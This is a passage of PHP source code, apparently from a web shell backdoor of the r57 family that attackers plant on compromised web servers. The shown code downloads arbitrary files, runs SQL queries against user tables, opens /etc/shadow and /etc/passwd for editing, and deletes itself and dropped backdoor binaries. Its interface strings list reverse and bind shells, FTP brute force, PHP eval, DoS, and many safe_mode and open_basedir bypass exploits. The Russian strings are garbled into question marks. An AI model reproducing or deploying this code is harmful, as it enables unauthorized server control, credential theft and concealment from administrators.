1553
1554 break;
1555
1556 default:
1557
1558 return 0;
1559
1560 break;
1561
1562 }
1563
1564 }
1565
1566 }
1567
1568if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
1569
1570 {
1571
1572 if($file=moreread($_POST['d_name'])){ $filedump = $file; }
1573
1574 else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
1575
1576 if(!empty($_POST['cmd']))
1577
1578 {
1579
1580 @ob_clean();
1581
1582 $filename = @basename($_POST['d_name']);
1583
1584 $content_encoding=$mime_type='';
1585
1586 compress($filename,$filedump,$_POST['compress']);
1587
1588 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
1589
1590 header("Content-type: ".$mime_type);
1591
1592 header("Content-disposition: attachment; filename=\"".$filename."\";");
1593
1594 echo $filedump;
1595
1596 exit();
1597
1598 }
1599
1600 }
1601
1602if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
1603
1604if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
1605
1606 {
1607
1608 echo $head;
1609
1610 $sql = new my_sql();
1611
1612 $sql->db = $_POST['db'];
1613
1614 $sql->host = $_POST['db_server'];
1615
1616 $sql->port = $_POST['db_port'];
1617
1618 $sql->user = $_POST['mysql_l'];
1619
1620 $sql->pass = $_POST['mysql_p'];
1621
1622 $sql->base = $_POST['mysql_db'];
1623
1624 $querys = @explode(';',$_POST['db_query']);
1625
1626 echo '<body bgcolor=#e4e0d8>';
1627
1628 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
1629
1630 else
1631
1632 {
1633
1634 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
1635
1636 else
1637
1638 {
1639
1640 foreach($querys as $num=>$query)
1641
1642 {
1643
1644 if(strlen($query)>5)
1645
1646 {
1647
1648 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
1649
1650 switch($sql->query($query))
1651
1652 {
1653
1654 case '0':
1655
1656 echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
1657
1658 break;
1659
1660 case '1':
1661
1662 if($sql->get_result())
1663
1664 {
1665
1666 echo "<table width=100%>";
1667
1668 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
1669
1670 $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
1671
1672 echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
1673
1674 for($i=0;$i<$sql->num_rows;$i++)
1675
1676 {
1677
1678 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
1679
1680 $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
1681
1682 echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
1683
1684 }
1685
1686 echo "</table>";
1687
1688 }
1689
1690 break;
1691
1692 case '2':
1693
1694 $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
1695
1696 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
1697
1698 break;
1699
1700 }
1701
1702 }
1703
1704 }
1705
1706 }
1707
1708 }
1709
1710 echo "<br><form name=form method=POST>";
1711
1712 echo in('hidden','db',0,$_POST['db']);
1713
1714 echo in('hidden','db_server',0,$_POST['db_server']);
1715
1716 echo in('hidden','db_port',0,$_POST['db_port']);
1717
1718 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
1719
1720 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
1721
1722 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
1723
1724 echo in('hidden','cmd',0,'db_query');
1725
1726 echo "<div align=center>";
1727
1728 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
1729
1730 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
1731
1732 echo "</form>";
1733
1734 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
1735
1736 }
1737
1738if(isset($_GET['12']))
1739
1740 {
1741
1742 @unlink(__FILE__);
1743
1744 }
1745
1746if(isset($_GET['11']))
1747
1748 {
1749
1750 @unlink($tempdir.'bdpl');
1751
1752 @unlink($tempdir.'back');
1753
1754 @unlink($tempdir.'bd');
1755
1756 @unlink($tempdir.'bd.c');
1757
1758 @unlink($tempdir.'dp');
1759
1760 @unlink($tempdir.'dpc');
1761
1762 @unlink($tempdir.'dpc.c');
1763
1764 @unlink($tempdir.'prxpl');
1765
1766 @unlink($tempdir.'grep.txt');
1767
1768 }
1769
1770if(isset($_GET['2']))
1771
1772{
1773
1774echo $head;
1775
1776function U_value($value)
1777
1778 {
1779
1780 if ($value == '') return '<i>no value</i>';
1781
1782 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
1783
1784 if ($value === null) return 'NULL';
1785
1786 if (@is_object($value)) $value = (array) $value;
1787
1788 if (@is_array($value))
1789
1790 {
1791
1792 @ob_start();
1793
1794 print_r($value);
1795
1796 $value = @ob_get_contents();
1797
1798 @ob_end_clean();
1799
1800 }
1801
1802 return U_wordwrap((string) $value);
1803
1804 }
1805
1806function U_wordwrap($str)
1807
1808 {
1809
1810 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
1811
1812 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
1813
1814 }
1815
1816if (@function_exists('ini_get_all'))
1817
1818 {
1819
1820 $r = '';
1821
1822 echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
1823
1824 foreach (@ini_get_all() as $key=>$value)
1825
1826 {
1827
1828 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
1829
1830 }
1831
1832 echo $r;
1833
1834 echo '</table>';
1835
1836 }
1837
1838echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1839
1840die();
1841
1842}
1843
1844if(isset($_GET['3']))
1845
1846 {
1847
1848 echo $head;
1849
1850 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
1851
1852 $cpuf = @file("cpuinfo");
1853
1854 if($cpuf)
1855
1856 {
1857
1858 $c = @sizeof($cpuf);
1859
1860 for($i=0;$i<$c;$i++)
1861
1862 {
1863
1864 $info = @explode(":",$cpuf[$i]);
1865
1866 if($info[1]==""){ $info[1]="---"; }
1867
1868 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1869
1870 }
1871
1872 echo $r;
1873
1874 }
1875
1876 else
1877
1878 {
1879
1880 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1881
1882 }
1883
1884 echo '</table>';
1885
1886 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1887
1888 die();
1889
1890 }
1891
1892if(isset($_GET['4']))
1893
1894 {
1895
1896 echo $head;
1897
1898 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
1899
1900 $memf = @file("meminfo");
1901
1902 if($memf)
1903
1904 {
1905
1906 $c = sizeof($memf);
1907
1908 for($i=0;$i<$c;$i++)
1909
1910 {
1911
1912 $info = explode(":",$memf[$i]);
1913
1914 if($info[1]==""){ $info[1]="---"; }
1915
1916 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1917
1918 }
1919
1920 echo $r;
1921
1922 }
1923
1924 else
1925
1926 {
1927
1928 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1929
1930 }
1931
1932 echo '</table>';
1933
1934 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1935
1936 die();
1937
1938 }
1939
1940
1941
1942if(isset($_GET['5']))
1943
1944 {$_POST['cmd'] = 'systeminfo';}
1945
1946if(isset($_GET['6']))
1947
1948 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
1949
1950if(isset($_GET['7']))
1951
1952 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
1953
1954if(isset($_GET['8']))
1955
1956 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
1957
1958if(isset($_GET['9']))
1959
1960 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
1961
1962if(isset($_GET['10']))
1963
1964 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
1965
1966if(isset($_GET['13']))
1967
1968 {$_POST['cmd']='cat /proc/cpuinfo';}
1969
1970if(isset($_GET['14']))
1971
1972 {$_POST['cmd']='cat /proc/version';}
1973
1974if(isset($_GET['15']))
1975
1976 {$_POST['cmd'] = 'free';}
1977
1978if(isset($_GET['16']))
1979
1980 {$_POST['cmd'] = 'dmesg(8)';}
1981
1982if(isset($_GET['17']))
1983
1984 {$_POST['cmd'] = 'vmstat';}
1985
1986if(isset($_GET['18']))
1987
1988 {$_POST['cmd'] = 'lspci';}
1989
1990if(isset($_GET['19']))
1991
1992 {$_POST['cmd'] = 'lsdev';}
1993
1994if(isset($_GET['20']))
1995
1996 {$_POST['cmd']='cat /proc/interrupts';}
1997
1998if(isset($_GET['21']))
1999
2000 {$_POST['cmd'] = 'cat /etc/*realise';}
2001
2002if(isset($_GET['22']))
2003
2004 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
2005
2006if(isset($_GET['23']))
2007
2008 {$_POST['cmd'] = 'lsattr -va';}
2009
2010if(isset($_GET['24']))
2011
2012 {$_POST['cmd'] = 'w';}
2013
2014if(isset($_GET['25']))
2015
2016 {$_POST['cmd'] = 'who';}
2017
2018if(isset($_GET['26']))
2019
2020 {$_POST['cmd'] = 'uptime';}
2021
2022if(isset($_GET['27']))
2023
2024 {$_POST['cmd'] = 'last -n 10';}
2025
2026if(isset($_GET['28']))
2027
2028 {$_POST['cmd'] = 'ps -aux';}
2029
2030if(isset($_GET['29']))
2031
2032 {$_POST['cmd'] = 'service --status-all';}
2033
2034if(isset($_GET['30']))
2035
2036 {$_POST['cmd'] = 'ifconfig';}
2037
2038if(isset($_GET['31']))
2039
2040 {$_POST['cmd'] = 'netstat -a';}
2041
2042if(isset($_GET['32']))
2043
2044 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
2045
2046if(isset($_GET['33']))
2047
2048 {$_POST['cmd'] = 'fdisk -l';}
2049
2050if(isset($_GET['34']))
2051
2052 {$_POST['cmd'] = 'df -h';}
2053
2054
2055
2056#if(isset($_GET['']))
2057
2058# {$_POST['cmd'] = '';}
2059
2060
2061
2062$lang=array(
2063
2064'ru_butt1' =>'?????????',
2065
2066'ru_butt2' =>'?????????',
2067
2068'ru_butt3' =>'???????',
2069
2070'ru_butt4' =>'?????????',
2071
2072'ru_butt5' =>'?????????',
2073
2074'ru_butt6' =>'???????',
2075
2076'ru_butt7' =>'???????',
2077
2078'ru_butt8' =>'?????????',
2079
2080'ru_butt9' =>'????',
2081
2082'ru_butt10'=>'?????????',
2083
2084'ru_butt11'=>'?????????????',
2085
2086'ru_butt12'=>'?????',
2087
2088'ru_butt13'=>'???????/???????',
2089
2090'ru_butt14'=>'???????',
2091
2092'ru_butt15'=>'?????????',
2093
2094'ru_text1' =>'??????????? ???????',
2095
2096'ru_text2' =>'?????????? ?????? ?? ???????',
2097
2098'ru_text3' =>'????????? ???????',
2099
2100'ru_text4' =>'??????? ??????????',
2101
2102'ru_text5' =>'???????? ?????? ?? ??????',
2103
2104'ru_text6' =>'????????? ????',
2105
2106'ru_text7' =>'??????',
2107
2108'ru_text8' =>'???????? ?????',
2109
2110'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
2111
2112'ru_text10'=>'??????? ????',
2113
2114'ru_text11'=>'?????? ??? ???????',
2115
2116'ru_text12'=>'back-connect',
2117
2118'ru_text13'=>'IP-?????',
2119
2120'ru_text14'=>'????',
2121
2122'ru_text15'=>'???????? ?????? ? ?????????? ???????',
2123
2124'ru_text16'=>'????????????',
2125
2126'ru_text17'=>'????????? ????',
2127
2128'ru_text18'=>'????????? ????',
2129
2130'ru_text19'=>'Exploits',
2131
2132'ru_text20'=>'????????????',
2133
2134'ru_text21'=>'????? ???',
2135
2136'ru_text22'=>'datapipe',
2137
2138'ru_text23'=>'????????? ????',
2139
2140'ru_text24'=>'????????? ????',
2141
2142'ru_text25'=>'????????? ????',
2143
2144'ru_text26'=>'????????????',
2145
2146'ru_text28'=>'?????? ? safe_mode',
2147
2148'ru_text29'=>'?????? ????????',
2149
2150'ru_text30'=>'???????? ?????',
2151
2152'ru_text31'=>'???? ?? ??????',
2153
2154'ru_text32'=>'?????????? PHP ????',
2155
2156'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)',
2157
2158'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
2159
2160'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
2161
2162'ru_text36'=>'???? . ???????',
2163
2164'ru_text37'=>'?????',
2165
2166'ru_text38'=>'??????',
2167
2168'ru_text39'=>'????',
2169
2170'ru_text40'=>'???? ??????? ???? ??????',
2171
2172'ru_text41'=>'????????? ? ?????',
2173
2174'ru_text42'=>'?????????????? ?????',
2175
2176'ru_text43'=>'????????????? ????',
2177
2178'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
2179
2180'ru_text45'=>'???? ????????',
2181
2182'ru_text46'=>'???????? phpinfo()',
2183
2184'ru_text47'=>'???????? ???????? php.ini',
2185
2186'ru_text48'=>'???????? ????????? ??????',
2187
2188'ru_text49'=>'???????? ??????? ? ???????',
2189
2190'ru_text50'=>'?????????? ? ??????????',
2191
2192'ru_text51'=>'?????????? ? ??????',
2193
2194'ru_text52'=>'????? ??? ??????',
2195
2196'ru_text53'=>'?????? ? ?????',
2197
2198'ru_text54'=>'????? ?????? ? ??????',
2199
2200'ru_text55'=>'?????? ? ??????',
2201
2202'ru_text56'=>'?????? ?? ???????',
2203
2204'ru_text57'=>'???????/??????? ????/??????????',
2205
2206'ru_text58'=>'???',
2207
2208'ru_text59'=>'????',
2209
2210'ru_text60'=>'??????????',
2211
2212'ru_text61'=>'???? ??????',
2213
2214'ru_text62'=>'?????????? ???????',
2215
2216'ru_text63'=>'???? ??????',
2217
2218'ru_text64'=>'?????????? ???????',
2219
2220'ru_text65'=>'???????',
2221
2222'ru_text66'=>'???????',
2223
2224'ru_text67'=>'Chown/Chgrp/Chmod',
2225
2226'ru_text68'=>'???????',
2227
2228'ru_text69'=>'????????1',
2229
2230'ru_text70'=>'????????2',
2231
2232'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
2233
2234'ru_text72'=>'????? ??? ??????',
2235
2236'ru_text73'=>'?????? ? ?????',
2237
2238'ru_text74'=>'?????? ? ??????',
2239
2240'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
2241
2242'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
2243
2244'ru_text80'=>'???',
2245
2246'ru_text81'=>'????',
2247
2248'ru_text82'=>'???? ??????',
2249
2250'ru_text83'=>'?????????? SQL ???????',
2251
2252'ru_text84'=>'SQL ??????',
2253
2254'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
2255
2256'ru_text86'=>'?????????? ????? ? ???????',
2257
2258'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
2259
2260'ru_text88'=>'??????:????',
2261
2262'ru_text89'=>'???? ?? ftp ???????',
2263
2264'ru_text90'=>'????? ????????',
2265
2266'ru_text91'=>'???????????? ?',
2267
2268'ru_text92'=>'??? ?????.',
2269
2270'ru_text93'=>'FTP',
2271
2272'ru_text94'=>'FTP-????????',
2273
2274'ru_text95'=>'?????? ?????????????',
2275
2276'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
2277
2278'ru_text97'=>'????????? ??????????: ',
2279
2280'ru_text98'=>'??????? ???????????: ',
2281
2282'ru_text99'=>'/etc/passwd',
2283
2284'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
2285
2286'ru_text101'=>'???????????? (user -> resu)',
2287
2288'ru_text102'=>'?????',
2289
2290'ru_text103'=>'???????? ??????',
2291
2292'ru_text104'=>'???????? ????? ?? ???????? ????',
2293
2294'ru_text105'=>'????',
2295
2296'ru_text106'=>'??',
2297
2298'ru_text107'=>'????',
2299
2300'ru_text108'=>'????? ??????',
2301
2302'ru_text109'=>'????????',
2303
2304'ru_text110'=>'??????????',
2305
2306'ru_text111'=>'SQL-?????? : ????',
2307
2308'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
2309
2310'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list() (PHP <= 5.1.2)',
2311
2312'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body() (PHP <= 5.1.2)',
2313
2314'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
2315
2316'ru_text116'=>'?????????? ????',
2317
2318'ru_text117'=>'?',
2319
2320'ru_text118'=>'???? ??????????',
2321
2322'ru_text119'=>'?? ??????? ??????????? ????',
2323
2324'ru_text120'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? ini_restore() (PHP <= 4.4.4, 5.1.6) by NST',
2325
2326'ru_text121'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? fopen() (PHP v4.4.0 memory leak) by NST',
2327
2328'ru_text122'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? glob() (PHP <= 5.2.x)',
2329
2330'ru_text123'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.bzip ?????? [compress.bzip2://] (PHP <= 5.2.1)',
2331
2332'ru_text124'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? error_log(php://) (PHP <= 5.1.4, 4.4.2)',
2333
2334'ru_text125'=>'??????',
2335
2336'ru_text126'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????[NULL-byte] (PHP <= 5.2.0)',
2337
2338'ru_text127'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? readfile(php://) (PHP <= 5.2.1, 4.4.4)',
2339
2340'ru_text128'=>'???? ?????????/??????? ????? (touch)',
2341
2342'ru_text129'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ? fopen(srpath://) (PHP v5.2.0)',
2343
2344'ru_text130'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.zip ?????? [zip://] (PHP <= 5.2.1)',
2345
2346'ru_text131'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ??????????? ????? ? ?????????????? symlink() (PHP <= 5.2.1)',
2347
2348'ru_text132'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? symlink() (PHP <= 5.2.1)',
2349
2350'ru_text133'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????(TMPDIR) (PHP <= 5.2.4)',
2351
2352'ru_text134'=>'???????? ??? ??????',
2353
2354'ru_text135'=>'???????',
2355
2356'ru_text136'=>'???????? ?????????? ??????',
2357
2358'ru_text137'=>'????????',
2359
2360'ru_text138'=>'???????',
2361
2362'ru_text139'=>'????-??????',
2363
2364'ru_text140'=>'DoS',
2365
2366'ru_text141'=>'?????????! ???????? ???? ???-???????.',
2367
2368'ru_text142'=>'????????? ???????',
2369
2370'ru_text143'=>'Temp: ',
2371
2372'ru_text144'=>'Test bypass safe_mode with load file in mysqli',
2373
2374'ru_text145'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? realpath() (PHP <= 5.2.4)',
2375
2376'ru_text146'=>'MAX ???-?? ????????',
2377
2378'ru_text147'=>'',
2379
2380'ru_text148'=>'',
2381
2382'ru_text149'=>'',
2383
2384'ru_text150'=>'',
2385
2386'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
2387
2388'ru_err1'=>'??????! ?? ???? ????????? ???? ',
2389
2390'ru_err2'=>'??????! ?? ??????? ??????? ',
2391
2392'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
2393
2394'ru_err4'=>'?????? ??????????? ?? ftp ???????',
2395
2396'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
2397
2398'ru_err6'=>'??????! ?? ??????? ????????? ??????',
2399
2400'ru_err7'=>'?????? ??????????',
2401
2402/* --------------------------------------------------------------- */
2403
2404'eng_butt1' =>'Execute',
2405
2406'eng_butt2' =>'Upload',
2407
2408'eng_butt3' =>'Bind',
2409
2410'eng_butt4' =>'Connect',
2411
2412'eng_butt5' =>'Run',
2413
2414'eng_butt6' =>'Change',
2415
2416'eng_butt7' =>'Show',
2417
2418'eng_butt8' =>'Test',
2419
2420'eng_butt9' =>'Dump',
2421
2422'eng_butt10'=>'Save',
2423
2424'eng_butt11'=>'Edit file',
2425
2426'eng_butt12'=>'Find',
2427
2428'eng_butt13'=>'Create/Delete',
2429
2430'eng_butt14'=>'Download',
2431
2432'eng_butt15'=>'Send',
2433
2434'eng_text1' =>'Executed command',
2435
2436'eng_text2' =>'Execute command on server',
2437
2438'eng_text3' =>'Run command',
2439
2440'eng_text4' =>'Work directory',
2441
2442'eng_text5' =>'Upload files on server',
2443
2444'eng_text6' =>'Local file',
2445
2446'eng_text7' =>'Aliases',
2447
2448'eng_text8' =>'Select alias',
2449
2450'eng_text9' =>'Bind port to /bin/bash',
2451
2452'eng_text10'=>'Port',
2453
2454'eng_text11'=>'Password for access',
2455
2456'eng_text12'=>'back-connect',
2457
2458'eng_text13'=>'IP',
2459
2460'eng_text14'=>'Port',
2461
2462'eng_text15'=>'Upload files from remote server',
2463
2464'eng_text16'=>'With',
2465
2466'eng_text17'=>'Remote file',
2467
2468'eng_text18'=>'Local file',
2469
2470'eng_text19'=>'Exploits',
2471
2472'eng_text20'=>'Use',
2473
2474'eng_text21'=>' New name',
2475
2476'eng_text22'=>'datapipe',
2477
2478'eng_text23'=>'Local port',
2479
2480'eng_text24'=>'Remote host',
2481
2482'eng_text25'=>'Remote port',
2483
2484'eng_text26'=>'Use',
2485
2486'eng_text28'=>'Work in safe_mode',
2487
2488'eng_text29'=>'ACCESS DENIED',
2489
2490'eng_text30'=>'Cat file',
2491
2492'eng_text31'=>'File not found',
2493
2494'eng_text32'=>'Eval PHP code',
2495
2496'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
2497
2498'eng_text34'=>'Test bypass safe_mode with include function',
2499
2500'eng_text35'=>'Test bypass safe_mode with load file in mysql',
2501
2502'eng_text36'=>'Database . Table',
2503
2504'eng_text37'=>'Login',
2505
2506'eng_text38'=>'Password',
2507
2508'eng_text39'=>'Database',
2509
2510'eng_text40'=>'Dump database table',
2511
2512'eng_text41'=>'Save dump in file',
2513
2514'eng_text42'=>'Edit files',
2515
2516'eng_text43'=>'File for edit',
2517
2518'eng_text44'=>'Can\'t edit file! Only read access!',
2519
2520'eng_text45'=>'File saved',
2521
2522'eng_text46'=>'Show phpinfo()',
2523
2524'eng_text47'=>'Show variables from php.ini',
2525
2526'eng_text48'=>'Delete temp files',
2527
2528'eng_text49'=>'Delete script from server',
2529
2530'eng_text50'=>'View cpu info',
2531
2532'eng_text51'=>'View memory info',
2533
2534'eng_text52'=>'Find text',
2535
2536'eng_text53'=>'In dirs',
2537
2538'eng_text54'=>'Find text in files',
2539
2540'eng_text55'=>'Only in files',
2541
2542'eng_text56'=>'Nothing :(',
2543
2544'eng_text57'=>'Create/Delete File/Dir',
2545
2546'eng_text58'=>'name',
2547
2548'eng_text59'=>'file',
2549
2550'eng_text60'=>'dir',
2551
2552'eng_text61'=>'File created',
2553
2554'eng_text62'=>'Dir created',
2555
2556'eng_text63'=>'File deleted',
2557
2558'eng_text64'=>'Dir deleted',
2559
2560'eng_text65'=>'Create',
2561
2562'eng_text66'=>'Delete',
2563
2564'eng_text67'=>'Chown/Chgrp/Chmod',
2565
2566'eng_text68'=>'Command',
2567
2568'eng_text69'=>'param1',
2569
2570'eng_text70'=>'param2',
2571
2572'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
2573
2574'eng_text72'=>'Text for find',
2575
2576'eng_text73'=>'Find in folder',
2577
2578'eng_text74'=>'Find in files',
2579
2580'eng_text75'=>'* you can use regexp',
2581
2582'eng_text76'=>'Search text in files via find',
2583
2584'eng_text80'=>'Type',
2585
2586'eng_text81'=>'Net',
2587
2588'eng_text82'=>'Databases',
2589
2590'eng_text83'=>'Run SQL query',
2591
2592'eng_text84'=>'SQL query',
2593
2594'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
2595
2596'eng_text86'=>'Download files from server',
2597
2598'eng_text87'=>'Download files from remote ftp-server',
2599
2600'eng_text88'=>'server:port',
2601
2602'eng_text89'=>'File on ftp',
2603
2604'eng_text90'=>'Transfer mode',
2605
2606'eng_text91'=>'Archivation',
2607
2608'eng_text92'=>'without arch.',
2609
2610'eng_text93'=>'FTP',
2611
2612'eng_text94'=>'FTP-bruteforce',
2613
2614'eng_text95'=>'Users list',
2615
2616'eng_text96'=>'Can\'t get users list',
2617
2618'eng_text97'=>'checked: ',
2619
2620'eng_text98'=>'success: ',
2621
2622'eng_text99'=>'/etc/passwd',
2623
2624'eng_text100'=>'Send file to remote ftp server',
2625
2626'eng_text101'=>'Use reverse (user -> resu)',
2627
2628'eng_text102'=>'Mail',
2629
2630'eng_text103'=>'Send email',
2631
2632'eng_text104'=>'Send file to email',
2633
2634'eng_text105'=>'To',
2635
2636'eng_text106'=>'From',
2637
2638'eng_text107'=>'Subj',
2639
2640'eng_text108'=>'Mail',
2641
2642'eng_text109'=>'Hide',
2643
2644'eng_text110'=>'Show',
2645
2646'eng_text111'=>'SQL-Server : Port',
2647
2648'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
2649
2650'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
2651
2652'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
2653
2654'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
2655
2656'eng_text116'=>'Copy from',
2657
2658'eng_text117'=>'to',
2659
2660'eng_text118'=>'File copied',
2661
2662'eng_text119'=>'Cant copy file',
2663
2664'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
2665
2666'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
2667
2668'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
2669
2670'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
2671
2672'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
2673
2674'eng_text125'=>'Data',
2675
2676'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
2677
